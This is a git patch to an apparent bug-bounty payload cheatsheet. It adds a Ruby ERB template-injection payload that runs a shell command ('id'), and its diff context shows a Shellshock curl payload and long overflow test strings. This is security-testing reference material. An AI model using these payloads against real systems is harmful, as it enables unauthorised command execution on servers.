From 1fd1c34ea59e164f7548d67dbe9276ee09f6aacc Mon Sep 17 00:00:00 2001 From: EdOverflow Date: Fri, 14 Jul 2017 15:35:52 +0100 Subject: [PATCH] Add template injection. --- README.md | 1 + cheatsheets/template-injection.md | 7 +++++++ payloads.txt | 4 +++- 3 files changed, 11 insertions(+), 1 deletion(-) create mode 100644 cheatsheets/template-injection.md diff --git a/README.md b/README.md index 9aa1f94..7a489ae 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,7 @@ - [RCE](cheatsheets/rce.md) - [Open Redirect](cheatsheets/open-redirect.md) - [Crypto](cheatsheets/crypto.md) +- [Template Injection](cheatsheets/template-injection.md) - [Content Injection](cheatsheets/content-injection.md) # Contributors diff --git a/cheatsheets/template-injection.md b/cheatsheets/template-injection.md new file mode 100644 index 0000000..c09d718 --- /dev/null +++ b/cheatsheets/template-injection.md @@ -0,0 +1,7 @@ +## Template Injection + +**Ruby** + +```ruby +<%=`id`%> +``` \ No newline at end of file diff --git a/payloads.txt b/payloads.txt index 37931af..6dc6bf7 100644 --- a/payloads.txt +++ b/payloads.txt @@ -89,4 +89,6 @@ curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/ 012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234 -0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345 \ No newline at end of file +0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345 + +<%=`id`%> \ No newline at end of file